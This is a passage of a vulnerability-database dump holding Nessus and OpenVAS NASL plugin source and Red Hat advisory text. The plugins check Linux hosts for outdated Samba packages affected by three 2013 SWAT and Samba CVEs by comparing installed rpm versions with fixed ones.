audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-client-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-common-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-doc-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-domainjoin-gui-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-swat-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-winbind-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-winbind-devel-3.6.6-0.136.el5\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-doc / etc\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:14:09", "description": "Updated samba packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nAll users of Samba are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the smb service will be restarted\nautomatically.", "edition": 25, "published": "2014-03-18T00:00:00", "title": "RHEL 5 : samba (RHSA-2014:0305)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "modified": "2014-03-18T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:samba", "p-cpe:/a:redhat:enterprise_linux:samba-common", "p-cpe:/a:redhat:enterprise_linux:libsmbclient", "p-cpe:/a:redhat:enterprise_linux:samba-client", "p-cpe:/a:redhat:enterprise_linux:samba-debuginfo", "p-cpe:/a:redhat:enterprise_linux:samba-swat"], "id": "REDHAT-RHSA-2014-0305.NASL", "href": "https://www.tenable.com/plugins/nessus/73072", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0305. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73072);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_bugtraq_id(57631, 61597);\n script_xref(name:\"RHSA\", value:\"2014:0305\");\n\n script_name(english:\"RHEL 5 : samba (RHSA-2014:0305)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nAll users of Samba are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the smb service will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2013-0213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2013-0214\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2013-4124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0305\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0214\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-4124\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0305\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"libsmbclient-3.0.33-3.40.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"libsmbclient-devel-3.0.33-3.40.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-3.0.33-3.40.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-3.0.33-3.40.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-3.0.33-3.40.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-client-3.0.33-3.40.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-client-3.0.33-3.40.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-client-3.0.33-3.40.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"samba-common-3.0.33-3.40.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"samba-debuginfo-3.0.33-3.40.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-swat-3.0.33-3.40.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-swat-3.0.33-3.40.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-swat-3.0.33-3.40.el5_10\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n }\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:36:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "Oracle Linux Local Security Checks ELSA-2013-1542", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123523", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-1542", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-1542.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123523\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:05:02 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-1542\");\n script_tag(name:\"insight\", value:\"ELSA-2013-1542 - samba security, bug fix, and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-1542\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-1542.html\");\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.6.9~164.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.9~164.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.9~164.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.9~164.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.6.9~164.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.9~164.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.6.9~164.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.6.9~164.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.9~164.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.6.9~164.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.6.9~164.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.6.9~164.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2014-03-20T00:00:00", "id": "OPENVAS:1361412562310871144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871144", "type": "openvas", "title": "RedHat Update for samba RHSA-2014:0305-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2014:0305-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871144\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-20 09:55:45 +0530 (Thu, 20 Mar 2014)\");\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for samba RHSA-2014:0305-01\");\n\n\n script_tag(name:\"affected\", value:\"samba on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nAll users of Samba are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the smb service will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0305-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-March/msg00024.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.40.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2013-10-03T00:00:00", "id": "OPENVAS:1361412562310871042", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871042", "type": "openvas", "title": "RedHat Update for samba3x RHSA-2013:1310-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba3x RHSA-2013:1310-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871042\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-03 10:16:53 +0530 (Thu, 03 Oct 2013)\");\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for samba3x RHSA-2013:1310-01\");\n\n\n script_tag(name:\"affected\", value:\"samba3x on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba3x packages also include numerous bug fixes. Space\nprecludes documenting all of these changes in this advisory. Users are\ndirected to the Red Hat Enterprise Linux 5.10 Technical Notes, linked to in\nthe References, for information on the most significant of these changes.\n\nAll samba3x users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the smb service will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2013:1310-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-September/msg00051.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba3x'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-debuginfo\", rpm:\"samba3x-debuginfo~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n 